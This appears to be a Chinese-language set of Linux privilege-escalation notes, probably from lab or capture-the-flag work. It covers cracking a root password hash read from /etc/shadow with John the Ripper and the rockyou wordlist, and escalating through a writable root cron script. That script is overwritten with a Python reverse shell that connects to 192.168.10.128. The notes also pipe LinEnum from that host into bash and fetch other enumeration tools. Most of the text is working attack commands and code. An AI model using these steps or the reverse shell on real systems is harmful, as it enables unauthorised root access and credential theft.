john爆破root密文

cat /etc/shadow

root:$6$URZ1c7qW$z5jZA6/j9fb8d4ExJOWuwCjEFo0tfBkfV.D3OIf0c0ukepcZYgrBhO6vjpNbmYct1uco9NrtBw3z50tCoMbqb1:18907:0:99999:7:::
gzip -d /usr/share/wordlists/rockyou.txt.gz

john --wordlist="/usr/share/wordlists/rockyou.txt" userpasswd

计划任务提权(cron Jobs)

定时任务(cron job)被用于安排那些需要被周期性执行的命令。利用它,你可以配置某些命令或者脚本,让它们在某个设定的时间内周期性地运行。cron 是 Linux 或者类 Unix 系统中最为实用的工具之一。cron 服务(守护进程)在系统后台运行,并且会持续地检查 /etc/crontab 文件和 /etc/cron.*/ 目录。它同样也会检查 /var/spool/cron/ 目录。

提权的前提是存在一个执行危险脚本的任务计划,并且这个任务计划执行的执行脚本可以被非root权限用户修改覆盖,并可以正常执行任务计划

信息收集

列出计划任务:

#/var/spool/cron/ 这个目录下存放的是每个用户包括root的crontab任务
/var/spool/cron/crontabs/root 这个目录是root任务文件,没有root权限无法查看
ls -alh /var/spool/cron	
ls -al /etc/cron*
#查看当前登陆用户的计划任务
crontab -l

cat /etc/crontab
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

tail -f /var/log/syslog

(root) CMD (bash -c "/script/cleanup.py")

查看日志文件 发现root每一分钟会执行一次 cleanup.py文件

修改内容 反弹shell

#!/usr/bin/env python3
import socket,subprocess,os
s =socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(( "192.168.10.128" , 6666 ))
os.dup2(s.fileno(), 0 )
os.dup2(s.fileno(), 1 )
os.dup2(s.fileno(), 2 )
p = subprocess.call([ "/bin/bash" , "-i" ])

pspy工具

wget 192.168.10.128/pspy64s
chmod  777 pspy64s
./pspy64s

可以看到这里,每分钟都会执行一次cleanup.py这个文件

发现计划任务,我们可以去检测该文件是否存在一些可能导致权限提升的问题。

提权脚本

LinEnum

https://github.com/rebootuser/LinEnum
wget -O - http://192.168.10.128/LinEnum.sh | bash

wget http://192.168.10.128/LinEnum.sh
chmod 777 LinEnum.sh
./LinEnum.sh > info.txt
cat info.txt|grep docker

linux-exploit-suggester2

wget http://192.168.10.128/linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl
perl linux-exploit-suggester-2.pl -k 3.0

linuxprivchecker

wget http://192.168.10.128/linuxprivchecker
python3 linuxprivchecker.py